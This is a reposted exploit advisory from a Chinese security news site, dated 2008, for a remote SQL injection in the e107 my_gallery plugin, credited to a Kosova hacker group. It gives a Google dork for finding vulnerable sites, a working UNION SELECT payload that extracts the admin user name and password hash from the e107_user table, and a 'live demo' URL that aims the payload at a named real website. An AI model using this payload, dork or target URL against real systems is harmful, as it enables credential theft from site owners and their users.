首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

e107 Plugin my_gallery (image) Remote SQL Injection Vulnerability


http://www.gipsky.com/
####################################################
e107 Plugin my_gallery Remote SQL-injetion Vulnerability
####################################################

#####################################
Author: boom3rang
Site: www.khg-crew.ws
Greetz: KHG & H!tm@N & chs & redc00de & proxy-ki11er
Site: www.khg-crew.ws
#####################################


- Download Plugin: http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.130

- Dork:
inurl:image_gallery.php?page=image-detail

- POC:
http://www.site.com/e107_Path/image_g ... il&album=1&image=[exploit]

- Exploit:
-9999 UNION SELECT concat_ws(char(58),user_name,user_password)KHG from e107_user where user_id=1--

- Live demo:
http://www.ifitbleeds.net/e107_plugin ... p;album=1&image=-9999 UNION SELECT concat_ws(char(58),user_name,user_password)KHG from e107_user where user_id=1--



#########################################
- Kosova Hackers Group
- United States of Albania
- Proud to be Albanian
- Proud to be Muslim
#########################################

[2008-09-21]
<< NetArtMedia Jobs Portal 1.3 Multiple SQL Injection Vulnerabilities Availscript Jobs Portal Script File Upload Vulnerability (auth) >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号